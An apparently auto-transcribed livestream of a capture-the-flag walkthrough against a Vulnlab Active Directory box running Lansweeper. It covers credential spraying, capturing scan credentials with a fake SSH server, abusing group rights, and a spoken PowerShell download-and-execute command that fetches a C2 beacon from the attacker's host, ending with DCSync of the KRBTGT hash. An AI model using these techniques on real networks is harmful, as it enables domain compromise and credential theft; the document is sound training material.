Okay. So, not sure what's going on with my computer recently. As I said in previous streams, I need a new system, but that's gonna have to wait. Now that you can actually hear me, I was saying that in about 2 weeks time I'm gonna do the house move, and then we can plan the OSCP style stream, the 24-hour stream. So keep an eye on Discord, as I will be posting there when that's gonna be happening. Okay, so we have this is an old vuln.lab box. So we have inventory.sweep.vl. Let's add that to our hosts. Actually, loot nxc smb 10.129 234 177, I think was the IP address. Yes, 177. Empty username, empty password, generate hosts file, tmp hosts. There we go. At least that way we know we've captured everything. Any certification, I think it's useful to have on your CV. It's up to a certain point, it gets you through the door with HR and the hiring manager and stuff like that. So it's a checkbox. It will get you through the door. Then, after you get the first interview, it's up to your skill level. So you would need to actually be able to talk about that certification, talk about the knowledge that comes from that certification. So it's a checkbox. What I can say is having OSCP on my CV helped me land my first cybersecurity job. So yes, from that point of view, I can definitely recommend actually getting the certification that you're looking for. The knowledge that you get from it is very valuable, but as I said, the checkbox that you also get for taking the certification and having that on your resume is valuable as well. So, what do we have here? So there is a Kestrel HTTP port on 9524, which is an unusual port. Did it come back on the... We also have 81 and 82, which seem to be, again, HTTP ports. I'm just gonna take screenshots of that. 9524. Okay. So we will need to investigate those and see what's there. Let's have a look. Let's open burp. And then we need Firefox. Let's have a look. So 81 first. Lansweeper, we need the username and password. Admin. No. Apparently we can do a Windows logon, but we don't have credentials. So let's keep that in mind. We'll need to check the username and password to see if there's the version, to see if there's an exploit for that as well. Okay, that one doesn't respond on anything. Is it over HTTPS? Okay, so it's still the same application, but over HTTPS. So let's take a screenshot of that. And then we had duplicate. Where's duplicate? 9524. Maybe it's over HTTP. Nope, it's a HTTPS, but it fails to load, or it's an empty response. So let's have a look. Okay, so Kestrel is empty. Let's do directory brute force on that one. Come on, yeah, that would be. I don't need. PHP because I don't know what it's being served. And that's empty. Do we need to run it via the domain name? Maybe. So that would be inventory.sweep.vl. No, it's still responding with an empty response. Yeah. API supported version 1.0. Okay, so let's have a look and see if we can find the version for Lansweeper. Actually, wait, what add-on did I use? I think I had something in burp. Yeah, weaponizer. But I need it in Firefox. So it doesn't detect the actual version. It just says ASP and jQuery, which doesn't really help us much. So we don't know if there's anything for that. Okay, so we can get, if we can get some sort of access to that. Lansweeper exploits. But we don't know the version for Lansweeper. So we cannot just run any exploit there, because I'm assuming that's the version. Right, so let's check. Lansweeper, anything for this particular version. That's 11.1.6. No, everything seems to be older. Okay, so we need another way in, basically, from what I can see. So let's go back to our SMB enumeration. Shares. Access denied. Great. LDAP. Oh no, it's over SMB. So okay, we don't have access as anonymous guest, maybe. There we go. So we got some users as guest. Let me just take a screenshot and then we can process that. Basically I want to save it as a file and then extract just the users. NXE users. Okay. Delimiter, what do we need? Delimiter needs to be that. Field 1. No, field 2. There we go. Pass that back to cut. Delimiter being space this time. Field 1. Ah, right. Because there's a space at the start, that's why it doesn't work. No, there's a machine account. We can also do. Are we back? I think we're streaming again. How are we looking? All good? So we can remove these because we don't need to do any kind of work there. There are some service users and there's a machine account there as well. My thought is either look for Kerberoastable users with NXC. We can try that. Although I'm not sure if it will allow guest access for Kerberoastable. No, I have not decided the date yet. I was just saying that at the start of the stream. We now have a completion date for our house move. That's gonna happen in the next 2 weeks. And then after that, we can actually schedule the date for the OSCP style stream. As you can imagine, being in the middle of a house move, I cannot really dedicate the full 24 hours to a stream right now, so I'll have to do that afterwards. But it's most probably gonna be at some point either at the end of June or start of July, but soon enough anyway. Okay, let's see if we can do some Kerber roasting, shall we? It's expecting an account. Kerber roast. Still expecting an account. Let's try. Let's see inventory windows. Okay, that's not gonna work. Okay, and neither is. So that's a dead end. We cannot really Kerberos those users. We don't have any kind of passwords. And I don't want to run password spraying with RawQ. That's just a a bad idea for CTFs in general, or for live engagements in any case. So what I'm gonna try to do now is use the same username and password and see if that works. So username equals password. So let's do SMB users what was it? Continue on success. No brute, I think. Let me check. No brute force. Let me just add some notes as well. So I wanted to continue on success, and I wanted to not try the combinations of one username with a different username as a password. I just want one-to-one matching. So that's why I'm doing the no brute force command here. So let's see. Will this yield any results? Fingers crossed. There we go. We have an intern. Bloody interns. Right, so next, of course, Bloodhound. We have credentials, so okay. 177. That's gonna be inventory. Sweep.vl. Sweep.vl. Intern. The intern. That's been collected. Bloodhound CLI up to bring up Bloodhound. Hopefully I did not forget to actually clean the database from the previous run. Actually, we can close that one. I did not. Sweep. Loot? No. Loot. Bloodhound. Upload. Come on. Okay. Let's search for our intern, shall we? Add to own. We can also do NXE shares in the meantime to see if there are any shares of interest. Okay, so we can read. Oh, we actually have quite a bit of access here. So and we can explore Bloodhound in a second. I just want to cover this as well. Tech Spider Plus. I'm in the wrong folder. Shares intern. Spider Plus. Tech O. Output folder equals this. Download flag equals true. Go. So now we have two avenues to explore. So let's have a look at Bloodhound while that's downloading. Everyone users, not really much this user can do. He's an intern, so of course. The main admins, just administrator. DCSync. Administrator, okay. Any Kerberoastable users? No. So let's have a look. We did see that intern. No, wasn't intern. What was the name? Inventory. Machine name. So that's the machine. Oh no, that's the actual DC. SVC. Lansweeper discovery. Okay. Members. Okay, we have. Oh. Okay, so we need to get to SVC inventory windows. That's good to know. So let's go back to that group. We have an outbound object control from discovery to admins, but we need to get to that group and let's have a look. Shares intern. Copy file, wallpaper. So there are some scripts in here, which we can have a look. Unfortunately, we don't have write access to any of the shares, but maybe there's a password or something in here. No. No, these look like standard scripts from the actual application. Okay. We can try to see if we can log in. Oh wait, it's a Windows logon, so intern. There we go. Okay, so we have quite a lot of functionality here. Thank you for the follow, Dog Chai. Welcome to the stream. Okay, so this is actually our DC. But what can we do? We can do a ping. Web browser configuration issue, okay. Why is everything failing? Comments, docs, config, environment, okay, processes, are some auto run tool, but what is going on? Okay, so we can save an asset, but I don't want to modify anything just yet. New asset. Ten, 14, 21. Let's open responder. Let's see if we can get anything to connect back. Responder on 10.0. Scan time. Okay, can we delete the asset and re-add it? I should have thought about that beforehand. Will that trigger a rescan? Yeah, delete asset. Come on. That's a lot of assets that are added there. Oh, I've added it as an alarm system. Yeah, there's Linux. What I'm thinking here, that the scanner will try to send credentials, maybe. That's why I have responder there. Last scan attempt, never. Scanning. Oh. Okay, so let's go back to assets. Where's our test one? Edit asset. Yeah, let's do it as a domain server. State active. Save. No, scanning. Oh, we also have a ping here. 10, 10, 14, 21. There we go. So we get an actual hash with responder. Now the question is, will this actually crack or not? I have no clue. It's a machine account, so it might not. So let's try. Hashcat. Sorry, I'm taking notes at the same time, and it did not crack. That's not great. So that's probably not the way forward. Let's see if we have any other options in here. Maybe we have a command injection or something along those lines. Let's remove ping from there and do something else. Responder, ICMP. TCP dump, ICMP. And ping tech and 2, 10, 10, 14, 21. Basically, I'm testing for command injection. Doesn't seem to work there. Scanning credentials. Okay, so we have apparently we have a password stored for SVC inventory Linux and Windows in here. But do we have... let me clear history. I'm wondering if they're being sent back to us in clear text in any way. No, so the password is actually it's obfuscated there, which means it's not being returned in clear text. But we still have an SSH there. So I've mapped those two credentials to my Windows box. Let's see. Let's start responder again and trigger another scan. Let me take some notes. Scanning targets. 10, 10, 14, 21. Scan now. And let's see if we get any credentials in responder from Linux SVC or SVC Win. Hopefully. No, so it's only scanning for... But the credentials are for SSH. That's not being sent. It's just the original inventory, which... Okay, let's edit the asset and make it a Linux server. let's trigger another scan. Still sending only the the credentials that we had before. Okay. Oh, scan in progress. I wonder if we need to do a fake SSH server. We can try that. We can try another scan now. See if we can get a connection on port 22, because the Linux credentials are mapped as SSH. But it does not look like it. Any ideas? Are we still streaming properly? I think we need an SSH server, a proper SSH server, don't we? Okay, let's try this. Let me add it to the notes. Okay. Yeah, I'm just gonna build it from source. Okay. So, data dir. Okay. Why is it listening on? I don't want that. Sudo. Nope. Let's see how we make it listen on port 22, not 2022. Okay. I think it's YAML. So I wanted to listen on 000.22. Config. Okay. So now it's basically listening on port 22. Let's trigger another scan. I should have left responder running as well. Where's our scanning credentials again? They're still mapped. Okay, so it did come in, but we're not getting anything here. Does it say any particular port for SSH? No. And we have it mapped. Ten 1421. Don't ping, because maybe we needed to add it as a scan target. Let's see. So we got the callback there, but we are not getting any data on our fake SSH honeypot. And why is that? Okay, so we get a ping. We get that, but it's not. Okay, so it should look something along those lines. So it does work. But our environment here is not sending the data. Ah, because we only have... Okay. So we have the IP range, but we don't have... Great. Scanning queue, scanning methods, assets. No, where was it? Scanning targets. IP range, scan now. Come on. Give me a username and a password. Apparently it does not want to. Let me remove the IPA and just use the range that we have here. We have the credentials attached to it. Let's add the Windows credentials as well, just in case. And okay, scan now. Yet again. We should see another ping come in when the scan is being triggered. There we go. We get the previous hash, but we get no SSH data. Why? Any ideas? Let's have a look. Welcome to learning. We're all learning. I haven't actually used this tool before. I haven't used the Lansweeper or the SSH honeypot, so maybe we need to put in the full configuration. It worked for local, but let's try a different port, shall we? Let's try the original port. What that means in here, edit SSH port. Yeah, okay. So we have the same port specified in both places. Okay, that's something. Failed to accept connection. Okay, let me remove all of this. But we have something going on there. Let me clear the screen. Why is it still scanning? Scan now. And now it's no longer scanning. Actually, no, I don't want to ignore Windows, just in case. So failed to accept connection. Why? But now at least we see that it's trying to connect. It means it's either something with how I've configured the honeypot, or it needs some other configuration there. This is getting a bit annoying. Let's start from scratch. Add scanning target. Maybe because we have it as an asset. Maybe let's remove it. IP range 10.10, 14.21. That's gonna be 20.22. Okay. Scanning credentials. Linux. Let's kill that one because we don't need it. Stop sending me data when I'm not requesting data. Let's double check. Okay, we have that mapped. I wonder if somehow responder is hello. Welcome to the stream. I wonder if somehow responder is interfering with our SSH honeypot. It might be. Okay, so it's we've got some ping requests there. And it's trying to do some SNMP scanning, but it's not connecting via SSH. But it's scanning. It's basically an SSH honeypot. I'm good. Got some good news. We're gonna be done with the house move in about 2 weeks, and then we can schedule the OSCP stream. 24-hour stream afterwards, so I'm excited about that. Of course, I'm excited about the house move as well, because we've been trying to do that for about 2 years now. So I think our problem was actually responder, not allowing it to communicate properly. Or maybe not. Ah, there we go. So it was responder. Responder was interfering with our scan. inventory Linux, and that is the password 0 something something. Okay, let's move out of that. We no longer need any of those. Let's validate the password. So nxc smb 10129 234 177 svc inventory Linux tag p shares. Okay, so access denied to SMB, but it's not actually giving us. No. Would help if I'm writing the username correct. There we go. So we validated the credentials that we've caught over SSH. Now let's go back to BloodHound. And see where we stand with this user. So SVC inventory Linux, we can mark this as owned. And Lansweeper discovery. We did see that Lansweeper discovery has a GenericAll. But we also have an outbound object control. Yeah, it's the okay. I wonder if this translates to an admin in Lansweeper itself. Let's see. Linux abuse. NetRPC. So NetRPC group add member target group is Lansweeper admins. Target user, let's add our intern. Sweep. Controlled user would be, oh, I forgot to create my creds file. Sorry, I'm all over the place today. So, controlled user is that one with the password. Domain controller 10 woof 129. Okay. Let's check. Can we see more stuff in here now? Do we need to log in and log out? Maybe. Log out. Well, we definitely see more stuff. So, where do we go from here? Okay, so apparently admins don't have access to that, or it's configured differently anyway. Event log. Oh, we can at least see some more data than we did last time. Software. So it's running as a system account. I am looking for a way to execute commands on the hosts through this at the moment. Let me take some screenshots. Okay, add a step. Command, step name. Yeah, I think it's time to start Adaptix. exe, yeah, that's fine. Psycho machine stream. This is sweep exploits. I just call it a.exe. And thank you. I do get a bit sidetracked and I kind of forget about that. 8443. So now we have Adaptex running. We have staged our payload there. Download and execute. Wait, before we do that, I want to see. Okay, so this is just running. Yeah, it's not running PowerShell, it's running by the looks of it. It's okay. Where's my test? Add step. Command. So we can do PowerShell.exe, taxi, wget, http 10.10.14.21 8443 a.exe out file Windows tasks a.exe. Let me take a screenshot of that. Okay, so that's our step one. Step name, download. Command execute PowerShell.exe taxi start process Windows tasks a.exe. Okay, so we have download and execute. Deploy. Default group. System account. Okay. Deployment logs. I don't think it deployed where I thought it would. No. Nothing yet. Failed to connect to assets. Do we need to assign? Map credentials. Workstation or domain? No, so inventory. Okay, so we've mapped the credentials to that. Let's go back to deployment packages, test, deploy now, selection, inventory. Okay. Scanning credentials? Maybe. Let's see. No credentials were found. My microphone is maxed out at the moment. Not sure what's going on. I did have some issues with my microphone when I started. Is that any better? Okay, so it's failing for credentials again. Yeah, I think I've basically maxed out my microphone. There seems to be some issue with my system. Let me just have a look. Is that any better? Okay. I think my system decided to turn down the volume a bit on my microphone. Yeah, I bet. So I'm doing something wrong here with the credentials. I'm assuming. Or maybe I'm missing something. Let's have a look at. So we know intern is a member of Oh. Okay. 177 intern. There we go. Oh yeah, this is a Vuln Lab machine, so the user flag might be on the C drive. Come on, I know I've messed up the command. Yep. There we go. At least we got the user flag. HTTP 10.10.14.21 8443 a.txt out file Windows tasks au.exe start process tasks, and we should get, there we go. So we do get a beacon as administrator. Let me add that to the notes. Sorry, just finishing my notes. There we go. So we have a beacon. As usual, we can run seatbelt. So execute assembly. Home path, documents, local scripts, sharp collection. Seven x64 seatbelt group equals all, and let's leave that one running. We can actually get the second one, so we have two file browser, because there were some interesting files there, if you remember correctly, in the shares. Now I'm not sure which one can execute, so let's see what users we have in here. Okay. I'm assuming we don't have access. Of course. anything in here. So documents, no. Desktop, we've already checked. There's nothing. Anything in downloads? No. Okay. Seatbelt is taking its time. I'm not concerned that I'm not 100% certain that I've actually. Let's have a look. Yeah, so we have James Green here. But we are admin at the moment because we are in the group. Yeah, inventory administrator. There we go. We got output from seatbelt. Let's have a look. So we know that there's the SVC inventory windows, which is part of the administrators group. So this one, it's an administrator on this box. And we know the credentials are stored inside of the tool itself, inside of Lansweeper. So we just need to extract those credentials somehow. Nothing there. Should we try to run WinPeas as well? That's gonna be, again, bloody awful to read, but or maybe not, because we cannot actually run it. What we can do is run it from here. Do we need that? No, we don't. Users, intern, desktop, upload. Hey, at least we get decent output from WinRM. I just had the thought we could, because we're administrator, do we have the ability to see the credentials here? No, we don't. Eesh. So sweep inventory is now mapped. Deployment packages. Let's clear the logs. Okay, nothing. Good. Test. Deploy now. Selection. Inventory. Scanning credentials. Okay. Ha! There we go. So my problem was mapping the credentials. Where is it? So I can take notes. So we've mapped the credentials based on the Windows computer name, and that basically allowed us to run the deployment. And we get a nice system level beacon in Adaptex, which means we've completely owned the machine. So we can do DCSync all. Come on. Get me the keys to the kingdom, which is the KRB TGT hash. There we go. So with that, basically you have full access to the domain. So with the KRB TGT hash, you can forge any tickets, you can create a skeleton key. The funny thing about the skeleton key, even if they change other hashes, it doesn't really matter, you have a backup. And if they change the hash for KRB TGT, they have to change the passwords for every user in Active Directory, every service account, everything needs to be reset. So that's a huge undertaking for any company out there. But now we can do pwd, where are we? Just to get the root flag. But we are basically done at this point. Cat C users administrator desktop root.txt. And there we go. We have the nice root flag. And it's been submitted. You've probably heard that. Any questions about what we've done on the machine today? What's right up? I'll post my write-up as well. Oh, okay. Yeah, I'll post it once I'm done. But yeah, I think that's it for tonight. I'll stream again tomorrow. I did get a request from someone on YouTube to do another machine. I think it was Lustrous 2, which is a hard machine from HackTheBox. We can tackle that one tomorrow. So tomorrow I'll start streaming about around... Yeah, it's a short stream today, sorry. So I'll start the streaming about an hour earlier than usual. And we can do a hard box, which means it's probably going to be a longer stream. So, but yeah, if you have any questions about this, it's been a bit troublesome with responder there, but actually, can we find another way to escalate to root? Let's have a look. I'm curious to see if we can find a different way. Okay. Configuration. No, that's scanning. I'm not interested in scanning. I'm interested in system. So what I'm thinking is, can we get the database details for Lansweeper and yeah, so it's connecting to SQL Server. Database tables. I'm wondering if we can get the credentials from the database. Unique IP credentials. Domain credentials. Those are just the links. So unique Windows credentials, there is some data in that table, but server options. Okay, let's have a look. See. Okay, so I wonder if that's the actual database. Yeah, it is the actual database because it's been modified today. But we might not have access. Yeah. We cannot actually copy it because it's being used by another program. Okay. Wait, I did see something in the database tables. Database maintenance. So there is a tools. Okay, we cannot execute that. Service. Okay, that's not what I wanted. Username administrator. Okay, so it's logged in as administrator, which won't help us. So I think that's probably the only way, at least from what I can see now, to get administrator there. Would have been nice to find a different way. We can probably find something, but as I said, it's been a long day. But yeah, I'll see you guys tomorrow. Let's see if we have anyone to actually raid. InfoSec streams. No, we don't. Well, I'll find someone to drop you off to. But I do want to thank everyone for being here tonight. And yeah, as I said, I'll be doing a harder box tomorrow, so expect a longer stream. In the meantime, let's see who we can drop into. Yeah, exactly. Some developer. Not too many people doing cybersecurity at the moment on Twitch. So there we go. There's a guy doing some DevOps infrastructure and computer networks. Let's see. Okay, that sounds about nice. So let's start that raid. Again, have a nice evening and see you all soon.